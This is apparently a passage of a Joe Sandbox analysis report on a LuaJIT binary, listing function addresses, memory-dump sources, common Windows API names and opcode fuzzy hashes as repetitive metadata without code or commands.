                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 725dd5f513ee018f179944fbfd3c274e410564992d79a5923990aa7a3aa2159f
                                                                                                                                                                        • Instruction ID: dc8974897d57ff6b5d275effc61c56258021046fb9d1c136e9eb0f83dddda677
                                                                                                                                                                        • Opcode Fuzzy Hash: 725dd5f513ee018f179944fbfd3c274e410564992d79a5923990aa7a3aa2159f
                                                                                                                                                                        • Instruction Fuzzy Hash: 492105A3A0925762E7217F219C41B7DEA50AF44BA0FD40235E92D073D2CF7EF441A72A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B11698 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                                                                                                                                        • Instruction ID: ca70219836ed25f7b99ebbc0109f82b6b48b6180839f8e7f32346d30b0b77eb4
                                                                                                                                                                        • Opcode Fuzzy Hash: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                                                                                                                                        • Instruction Fuzzy Hash: 94214933A08A4397DB61AF18D44037DF6A2EB84B90F980234E65D4B6D5DF3ED4009B15
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFAC60 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                        • Opcode ID: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                                                                                                                                        • Instruction ID: 167c6b8e70a5d69b246a1f543f38c16bf6e7951fdfd9384a2dfce275394f4e96
                                                                                                                                                                        • Opcode Fuzzy Hash: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                                                                                                                                        • Instruction Fuzzy Hash: 99214F32E06B819EEB11AFA4C8446ECB7B0EB44B0CFA44536D74D02B85DF39E545DB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFB114 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                                                                                                                                        • Instruction ID: 5274edc1ab34e4fad34dbdb4e78ac1f75294c53f84b2679dcb744a0fa15ac93c
                                                                                                                                                                        • Opcode Fuzzy Hash: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                                                                                                                                        • Instruction Fuzzy Hash: 2A11C673A0F58251FA50BA109800BBDD2A0AF45B84FD40132EA6C57A86DF3EE401A729
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFB3A0 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                                                                                                                                        • Instruction ID: 3b96a6402ff3365a4c3a8802c65d2964cb958382ddf38753ea5ec9fb3c3f1c9f
                                                                                                                                                                        • Opcode Fuzzy Hash: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E018672A0AB4150EA04AB529D01579D6E1BB85FE0F884632EE6C57BD9DE3DE0425318
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A3ACA0 Relevance: 1.5, APIs: 1, Instructions: 42stringCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-0
                                                                                                                                                                        • Opcode ID: 780b0584eb1b015e06906ae28c91b89760f41660562197ec5489c976ab8378eb
                                                                                                                                                                        • Instruction ID: 30c692e9ada95cd6d14891adfc0761ce7dcb790c74d8ade15d250974ab57fa8c
                                                                                                                                                                        • Opcode Fuzzy Hash: 780b0584eb1b015e06906ae28c91b89760f41660562197ec5489c976ab8378eb
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E11D833908A969BD720EA04E04442EF761F7C5745F600135EB8D47B98CB7EE941EF08
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0D534 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                                                                                                                                        • Instruction ID: a969076bcb63a089bb4f87b2a1c16f3975fce55b5379892ad330c1a0a88f53af
                                                                                                                                                                        • Opcode Fuzzy Hash: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                                                                                                                                        • Instruction Fuzzy Hash: 0B11C4B390A643A5EA05BF54D8406ACF760EF807A8FD44232E65D062D5DF7EF000EB26
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFAF18 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 6b95eac102df65bb9225ae6595800cc8afe0f5ca61e7e8ab3e37982ea9be704d
                                                                                                                                                                        • Instruction ID: 48d29e4f285121930b67dd5a3a23fc9c1e176fda0aef154e567a5acee8e1e358
                                                                                                                                                                        • Opcode Fuzzy Hash: 6b95eac102df65bb9225ae6595800cc8afe0f5ca61e7e8ab3e37982ea9be704d
                                                                                                                                                                        • Instruction Fuzzy Hash: A601B593A0B54322FA147B659C11BBCD2405F45BBCFA40331E92D4A2D2CE7EF401A32A
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0143C Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: ba8b74a22ca483c8fd1bc8d40430ac476202c0d98097674f29433e3d88bf1dae
                                                                                                                                                                        • Instruction ID: b59bd5f01f5f1a4f1a27631d0679567f92053bcfa6dcee46fbf70e67b78b625d
                                                                                                                                                                        • Opcode Fuzzy Hash: ba8b74a22ca483c8fd1bc8d40430ac476202c0d98097674f29433e3d88bf1dae
                                                                                                                                                                        • Instruction Fuzzy Hash: 14013CB3A00B16A8EB05DFA0D8408ECB7B8FB24748B904125DA5C17758DF35D2A5C7A5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738B0921C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF738B0AB79,?,?,?,00007FF738AFAF01,?,?,?,?,00007FF738B102A3), ref: 00007FF738B09271
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                                                                                                                                        • Instruction ID: 0eecab4cc6e8a9899e55bd2cc506304fce61f66cd43954740431d6c72d4dea6b
                                                                                                                                                                        • Opcode Fuzzy Hash: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                                                                                                                                        • Instruction Fuzzy Hash: 12F0C282B0E203A0FE5476A548007B9E1841F89B80FCC4030CC1E866D6DF3EF480663B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A44600 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fread_nolock_invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2335118202-0
                                                                                                                                                                        • Opcode ID: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                                                                                                                                        • Instruction ID: 2c730b3a9e6ea62e4b8692293c45c7cb69d2a70b49b61a6929ee3be2ca14aae8
                                                                                                                                                                        • Opcode Fuzzy Hash: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                                                                                                                                        • Instruction Fuzzy Hash: EC010C3260AB4991DA209B15E48071EE7A4FBC8BC8F900121EACD47B69DF7DC2518B54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738AFAF9C Relevance: 1.5, APIs: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                                                                                                                                        • Instruction ID: 263e6cdd50806fbd8b27c07e43677131bf8ddd9a4063bc052ade5abf086d24bd
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                                                                                                                                        • Instruction Fuzzy Hash: 54F09063A0E54362EA45BB69A8019BCD1909F41B98FE40131F6598A2C3DE7EF441A729
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A35074 Relevance: 1.5, APIs: 1, Instructions: 30libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                                                                                                                                        • Instruction ID: 8d410c63e195f4f399957cd8eabefe7f50bd67cde6a2752d3a7ad7a2d09c7f2b
                                                                                                                                                                        • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                                                                                                                                        • Instruction Fuzzy Hash: 93011927205A84C9D706AF3EC4504ACB7A4FB09F8DB084225DF896772CEF36D545D750
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A8ADE0 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,00007FF738A8AF20,?,?,?,?,00007FF738A8AABE), ref: 00007FF738A8AE07
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                        • Opcode ID: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                                                                                                                                        • Instruction ID: 5911d1b5d2ffc873d0565eb3969c090d320a6730efede651decda2005a71f6a6
                                                                                                                                                                        • Opcode Fuzzy Hash: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                                                                                                                                        • Instruction Fuzzy Hash: 90E0397260C68183D320DF01E44061EFBB0F784784F900525EACC03A28CB7DD5548F04
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00007FF738A8AD30 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
